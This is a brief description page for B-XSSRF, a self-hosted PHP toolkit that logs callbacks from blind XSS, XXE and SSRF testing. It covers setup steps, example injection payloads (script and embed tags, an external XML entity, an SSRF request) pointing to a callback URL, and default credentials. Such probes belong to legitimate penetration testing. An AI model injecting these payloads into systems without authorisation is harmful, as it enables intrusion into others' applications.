B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF


Toolkit to detect and keep track on Blind XSS, XXE & SSRF.

SETUP
  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE
BLIND XSS
<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">
BLIND XXE
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS
USER : [email protected]
PASS : 123456


Disqus Comments